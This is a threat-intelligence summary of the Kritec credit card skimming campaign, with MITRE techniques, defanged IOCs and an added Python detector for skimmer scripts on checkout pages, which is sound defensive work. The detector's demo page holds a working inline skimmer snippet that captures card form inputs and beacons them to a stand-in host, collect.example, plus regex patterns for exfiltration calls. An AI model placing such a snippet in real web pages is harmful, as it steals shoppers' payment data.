Credit card skimming campaigns are rising during the holiday shopping season, with the Kritec operation tailoring its skimmers for each victim site and expanding its infrastructure. The article also offers safety guidance for online shoppers and publishes a list of related infrastructure IOCs.
#Kritec #CreditCardSkimming
Keypoints
- The Kritec credit card skimming operation first appeared in March 2023 and stands out for its large volume and for skimmer templates built per victim site.
- Attackers customize the skimmer for each compromised store, matching the site's look and localizing the fake payment form in multiple languages, so shoppers have little chance of telling it apart from the real checkout.
- Activity spiked in October; the article measures it by the number of newly registered domain names attributed to the threat actor, a proxy for how much fresh infrastructure the campaign is standing up.
- The skimming infrastructure is hosted on the IT WEB LTD network (AS200313), registered in the British Virgin Islands.
- Practical guidance: merchants should keep their CMS and plugins patched (outdated e-commerce software is the usual entry point), and shoppers should use web protection tools that block known skimmer domains and apply heuristic detection to malicious JavaScript, since a blocklist alone lags behind newly registered domains.
- Malwarebytes publishes a list of Kritec infrastructure domains and IPs so that community blocklists and defensive products can pick them up.
MITRE Techniques
- [T1189] Drive-by Compromise: the attacker compromises merchant websites and inserts skimmer code that runs in every shopper's browser during checkout (the shopper's device itself is not exploited; the injected script captures the payment form in the page); "When a merchant website is hacked, any purchase made has the potential of being intercepted by bad actors. Often, the malicious code is right underneath the surface and yet completely invisible to shoppers."
- [T1583.003] Acquire Infrastructure: Domains: the campaign registers new domains to host and receive skimmer traffic; "We measured this activity based on the number of newly registered domain names attributed to this threat actor."
Indicators of Compromise
- [Domain] Kritec domains β oumymob[.]shop, nujtec[.]shop, and other domains
- [IP] Kritec IPs β 195[.]242[.]110[.]102, 195[.]242[.]110[.]103, and other IPs
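The two defensive points above, blocking the published Kritec infrastructure and heuristically spotting skimmer-like JavaScript that a blocklist would miss, can be combined in one page check. The following is an added example written for this summary; it is not code from the Malwarebytes article and makes no claim about how the Kritec skimmer is actually written. It assumes a merchant domain (`example-merchant.test`), a constructed checkout page, and a hypothetical third-party host (`collect.example`) that stands in for a not-yet-listed exfiltration domain. The four IOCs are the ones published above, kept defanged in the source and refanged only for matching.

```python
"""Added example (not from the Malwarebytes article): check a checkout page's
scripts against the published Kritec IOCs and a simple skimmer heuristic."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators from the Kritec IOC list above, kept defanged as published.
KRITEC_IOCS = [
    "oumymob[.]shop", "nujtec[.]shop",
    "195[.]242[.]110[.]102", "195[.]242[.]110[.]103",
]

def refang(ioc: str) -> str:
    """Turn a defanged indicator ('a[.]b') back into a matchable host."""
    return ioc.replace("[.]", ".").strip().lower()

BLOCKLIST = {refang(i) for i in KRITEC_IOCS}

# Heuristic signals for an in-page skimmer: it must read checkout input AND
# send it somewhere off-site. Either alone is normal on a real checkout page.
FORM_HOOK_RE = re.compile(
    r"addEventListener\(\s*['\"](?:submit|input|change|keyup|blur)['\"]"
    r"|onsubmit|document\.forms|querySelectorAll\(\s*['\"]input", re.I)
EXFIL_RE = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new\s+Image\(", re.I)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.I)

def _registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels): fine for a demo, use a PSL in production."""
    return ".".join(host.lower().split(".")[-2:])

def same_site(host: str, merchant_host: str) -> bool:
    return _registrable(host) == _registrable(merchant_host)

class _ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and the bodies of inline <script>s."""
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_inline, self._buf = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline = True
    def handle_data(self, data):
        if self._in_inline:          # script text may arrive in several chunks
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._buf, self._in_inline = [], False

def scan_page(html: str, merchant_host: str) -> list[dict]:
    """Return findings: IOC hits are 'block', heuristic-only hits are 'suspicious'."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = (urlparse(src).hostname or "").lower()
        if host in BLOCKLIST:
            findings.append({"where": "script src", "host": host, "verdict": "block",
                             "reason": "host is on the Kritec IOC list"})
    for body in parser.inline:
        hosts = {h.lower() for h in URL_HOST_RE.findall(body)}
        foreign = sorted(h for h in hosts if not same_site(h, merchant_host))
        blocked = [h for h in foreign if h in BLOCKLIST]
        if blocked:
            findings.append({"where": "inline script", "host": blocked[0], "verdict": "block",
                             "reason": "sends data to a Kritec IOC host"})
        elif foreign and FORM_HOOK_RE.search(body) and EXFIL_RE.search(body):
            findings.append({"where": "inline script", "host": foreign[0], "verdict": "suspicious",
                             "reason": "hooks form input and sends it off-site"})
    return findings

# Constructed checkout page for the demo, not a real Kritec capture. The IOC
# host is refanged here only so the parser sees a realistic URL; collect.example
# is a hypothetical drop host that is not on any list yet.
SAMPLE_PAGE = f"""
<html><body>
<form id="checkout" action="/pay">
  <input name="cc_number"><input name="cc_exp"><input name="cc_cvv">
</form>
<script src="https://cdn.example-merchant.test/js/checkout.js"></script>
<script src="https://{refang('nujtec[.]shop')}/js/jquery.min.js"></script>
<script>
  // first-party analytics: reads nothing from the form, stays on-site
  fetch("https://stats.example-merchant.test/hit?p=checkout");
</script>
<script>
  document.getElementById("checkout").addEventListener("submit", function () {{
    var d = {{}};
    document.querySelectorAll("input").forEach(function (i) {{ d[i.name] = i.value; }});
    new Image().src = "https://collect.example/c.php?q=" + btoa(JSON.stringify(d));
  }});
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE, "shop.example-merchant.test"):
        print(f["verdict"].upper(), f["where"], f["host"], "-", f["reason"])
```

Run against the constructed page, the external script from nujtec[.]shop is blocked on the IOC match, the first-party analytics call is ignored, and the inline script that hooks the submit event and beacons the inputs to collect.example is flagged as suspicious even though that host is on no list. That second path is the point: a campaign that keeps registering fresh domains will outrun any static blocklist, so the off-site-exfiltration heuristic has to carry weight on its own. The regexes are deliberately simple; a production detector would also look at obfuscated or dynamically built URLs, which this example does not attempt.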